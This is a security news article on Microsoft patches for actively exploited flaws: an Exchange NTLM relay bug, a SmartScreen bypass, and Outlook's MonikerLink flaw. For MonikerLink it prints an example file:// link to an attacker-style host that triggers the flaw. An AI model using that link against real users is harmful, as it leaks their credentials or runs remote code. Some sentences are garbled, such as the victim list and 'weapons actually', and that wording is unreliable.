Microsoft on Wednesday acknowledged that a recently disclosed critical security flaw in Exchange Server was being actively exploited in the wild, a day after releasing fixes for the vulnerability as part of its Patch Tuesday updates.
Tracked as CVE-2024-21410 (CVSS Score: 9.8), the issue was described as a case of privilege escalation impacting Exchange Server.
“An attacker could target an NTLM client such as Outlook with an NTLM credential leak vulnerability,” the company said in an advisory published this week.
“The leaked credentials can then be forwarded to the Exchange server to gain privileges as the victim’s client and perform operations on the Exchange server on behalf of the victim.”
Successful exploitation of the flaw could allow an attacker to forward a user’s leaked Net-NTLMv2 hash to a susceptible Exchange server and authenticate themselves as the user, Redmond added.
The tech giant, in an update to its bulletin, revised its exploitability rating to “Exploitation Detected,” noting that it has now enabled Extended Authentication Protection (EPA) by default with the Exchange Server update 2019 Cumulative Update 14 (CU14).
Details about the nature of the exploitation and the identity of threat actors who may be abusing the flaw are currently unknown. However, Russian state-affiliated hacking teams like APT28 (also known as Forest Blizzard) have a history of exploiting flaws in Microsoft Outlook to mount NTLM relay attacks.
Earlier this month, Trend Micro implicated the adversary in NTLM attacks against high-value entities since at least April 2022. The intrusions targeted foreign affairs, energy, defense, and transportation organizations, as well as those involved in work, social assistance. , finance, parenting and local city councils.
CVE-2024-21410 joins two other Windows flaws – CVE-2024-21351 (CVSS score: 7.6) and CVE-2024-21412 (CVSS score: 8.1) – which were patched by Microsoft this week and actively used as weapons actually. global attacks.
The exploitation of CVE-2024-21412, a bug that allows Windows SmartScreen protections to be bypassed, has been attributed to an advanced persistent threat called Water Hydra (also known as DarkCasino), which previously exploited zero-days in WinRAR to distribute the DarkMe Trojan.
“The group used Internet shortcuts disguised as a JPEG image that, when selected by the user, allow the threat actor to exploit CVE-2024-21412,” Trend Micro said. “The group can then bypass Microsoft Defender SmartScreen and fully compromise the Windows host as part of its attack chain.”
Microsoft’s Patch Tuesday update also addresses CVE-2024-21413, another critical flaw affecting Outlook email software that could lead to remote code execution by trivially bypassing security measures such as Protected View.
Codenamed MonikerLink by Check Point, the issue “enables broad and severe impact, ranging from information leakage of local NTLM credentials to arbitrary code execution.”
The vulnerability results from incorrectly parsing “file://” hyperlinks by adding an exclamation point to URLs that point to arbitrary payloads hosted on servers controlled by the attacker (for example, “file:///\\ 10.10.111.111\test\test .rtf!something”).
“The bug not only allows leakage of local NTLM information, but may also allow remote code execution and more as an attack vector,” the cybersecurity firm said. “It could also bypass Office Protected View when used as an attack vector to target other Office applications.”